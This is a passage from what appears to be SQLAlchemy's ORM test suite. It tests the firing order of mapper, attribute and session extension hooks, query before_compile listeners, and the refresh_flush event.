['instrument_class', 'instrument_class', 'init_instance',
'before_insert', 'after_insert',
'reconstruct_instance',
'before_update', 'after_update', 'before_delete',
'after_delete'])
def test_unnecessary_methods_not_evented(self):
users = self.tables.users
class MyExtension(sa.orm.MapperExtension):
def before_insert(self, mapper, connection, instance):
pass
class Foo(object):
pass
m = mapper(Foo, users, extension=MyExtension())
assert not m.class_manager.dispatch.load
assert not m.dispatch.before_update
assert len(m.dispatch.before_insert) == 1
class AttributeExtensionTest(fixtures.MappedTest):
@classmethod
def define_tables(cls, metadata):
Table('t1',
metadata,
Column('id', Integer, primary_key=True),
Column('type', String(40)),
Column('data', String(50))
)
def test_cascading_extensions(self):
t1 = self.tables.t1
ext_msg = []
class Ex1(sa.orm.AttributeExtension):
def set(self, state, value, oldvalue, initiator):
ext_msg.append("Ex1 %r" % value)
return "ex1" + value
class Ex2(sa.orm.AttributeExtension):
def set(self, state, value, oldvalue, initiator):
ext_msg.append("Ex2 %r" % value)
return "ex2" + value
class A(fixtures.BasicEntity):
pass
class B(A):
pass
class C(B):
pass
mapper(
A, t1, polymorphic_on=t1.c.type, polymorphic_identity='a',
properties={
'data': column_property(t1.c.data, extension=Ex1())
}
)
mapper(B, polymorphic_identity='b', inherits=A)
mapper(C, polymorphic_identity='c', inherits=B, properties={
'data': column_property(t1.c.data, extension=Ex2())
})
a1 = A(data='a1')
b1 = B(data='b1')
c1 = C(data='c1')
eq_(a1.data, 'ex1a1')
eq_(b1.data, 'ex1b1')
eq_(c1.data, 'ex2c1')
a1.data = 'a2'
b1.data = 'b2'
c1.data = 'c2'
eq_(a1.data, 'ex1a2')
eq_(b1.data, 'ex1b2')
eq_(c1.data, 'ex2c2')
eq_(ext_msg, ["Ex1 'a1'", "Ex1 'b1'", "Ex2 'c1'",
"Ex1 'a2'", "Ex1 'b2'", "Ex2 'c2'"])
class SessionExtensionTest(_fixtures.FixtureTest):
run_inserts = None
def test_extension(self):
User, users = self.classes.User, self.tables.users
mapper(User, users)
log = []
class MyExt(sa.orm.session.SessionExtension):
def before_commit(self, session):
log.append('before_commit')
def after_commit(self, session):
log.append('after_commit')
def after_rollback(self, session):
log.append('after_rollback')
def before_flush(self, session, flush_context, objects):
log.append('before_flush')
def after_flush(self, session, flush_context):
log.append('after_flush')
def after_flush_postexec(self, session, flush_context):
log.append('after_flush_postexec')
def after_begin(self, session, transaction, connection):
log.append('after_begin')
def after_attach(self, session, instance):
log.append('after_attach')
def after_bulk_update(
self,
session, query, query_context, result
):
log.append('after_bulk_update')
def after_bulk_delete(
self,
session, query, query_context, result
):
log.append('after_bulk_delete')
sess = create_session(extension=MyExt())
u = User(name='u1')
sess.add(u)
sess.flush()
assert log == [
'after_attach',
'before_flush',
'after_begin',
'after_flush',
'after_flush_postexec',
'before_commit',
'after_commit',
]
log = []
sess = create_session(autocommit=False, extension=MyExt())
u = User(name='u1')
sess.add(u)
sess.flush()
assert log == ['after_attach', 'before_flush', 'after_begin',
'after_flush', 'after_flush_postexec']
log = []
u.name = 'ed'
sess.commit()
assert log == ['before_commit', 'before_flush', 'after_flush',
'after_flush_postexec', 'after_commit']
log = []
sess.commit()
assert log == ['before_commit', 'after_commit']
log = []
sess.query(User).delete()
assert log == ['after_begin', 'after_bulk_delete']
log = []
sess.query(User).update({'name': 'foo'})
assert log == ['after_bulk_update']
log = []
sess = create_session(autocommit=False, extension=MyExt(),
bind=testing.db)
sess.connection()
assert log == ['after_begin']
sess.close()
def test_multiple_extensions(self):
User, users = self.classes.User, self.tables.users
log = []
class MyExt1(sa.orm.session.SessionExtension):
def before_commit(self, session):
log.append('before_commit_one')
class MyExt2(sa.orm.session.SessionExtension):
def before_commit(self, session):
log.append('before_commit_two')
mapper(User, users)
sess = create_session(extension=[MyExt1(), MyExt2()])
u = User(name='u1')
sess.add(u)
sess.flush()
assert log == [
'before_commit_one',
'before_commit_two',
]
def test_unnecessary_methods_not_evented(self):
class MyExtension(sa.orm.session.SessionExtension):
def before_commit(self, session):
pass
s = Session(extension=MyExtension())
assert not s.dispatch.after_commit
assert len(s.dispatch.before_commit) == 1
class QueryEventsTest(
_RemoveListeners, _fixtures.FixtureTest, AssertsCompiledSQL):
__dialect__ = 'default'
@classmethod
def setup_mappers(cls):
User = cls.classes.User
users = cls.tables.users
mapper(User, users)
def test_before_compile(self):
@event.listens_for(query.Query, "before_compile", retval=True)
def no_deleted(query):
for desc in query.column_descriptions:
if desc['type'] is User:
entity = desc['expr']
query = query.filter(entity.id != 10)
return query
User = self.classes.User
s = Session()
q = s.query(User).filter_by(id=7)
self.assert_compile(
q,
"SELECT users.id AS users_id, users.name AS users_name "
"FROM users "
"WHERE users.id = :id_1 AND users.id != :id_2",
checkparams={'id_2': 10, 'id_1': 7}
)
def test_alters_entities(self):
User = self.classes.User
@event.listens_for(query.Query, "before_compile", retval=True)
def fn(query):
return query.add_columns(User.name)
s = Session()
q = s.query(User.id, ).filter_by(id=7)
self.assert_compile(
q,
"SELECT users.id AS users_id, users.name AS users_name "
"FROM users "
"WHERE users.id = :id_1",
checkparams={'id_1': 7}
)
eq_(
q.all(),
[(7, 'jack')]
)
class RefreshFlushInReturningTest(fixtures.MappedTest):
"""test [ticket:3427].
this is a rework of the test for [ticket:3167] stated
in test_unitofworkv2, which tests that returning doesn't trigger
attribute events; the test here is *reversed* so that we test that
it *does* trigger the new refresh_flush event.
"""
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
'test', metadata,
Column('id', Integer, primary_key=True,
test_needs_autoincrement=True),
Column('prefetch_val', Integer, default=5),
Column('returning_val', Integer, server_default="5")
)
@classmethod
def setup_classes(cls):
class Thing(cls.Basic):
pass
@classmethod
def setup_mappers(cls):
Thing = cls.classes.Thing
mapper(Thing, cls.tables.test, eager_defaults=True)
def test_no_attr_events_flush(self):
Thing = self.classes.Thing
mock = Mock()
event.listen(Thing, "refresh_flush", mock)
t1 = Thing()
s = Session()
s.add(t1)
s.flush()
if testing.requires.returning.enabled:
# ordering is deterministic in this test b.c. the routine
# appends the "returning" params before the "prefetch"
# ones. if there were more than one attribute in each category,
# then we'd have hash order issues.
eq_(
mock.mock_calls,
[call(t1, ANY, ['returning_val', 'prefetch_val'])]
)
else:
eq_(
mock.mock_calls,
[call(t1, ANY, ['prefetch_val'])]
)
eq_(t1.id, 1)
eq_(t1.prefetch_val, 5)
eq_(t1.returning_val, 5)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.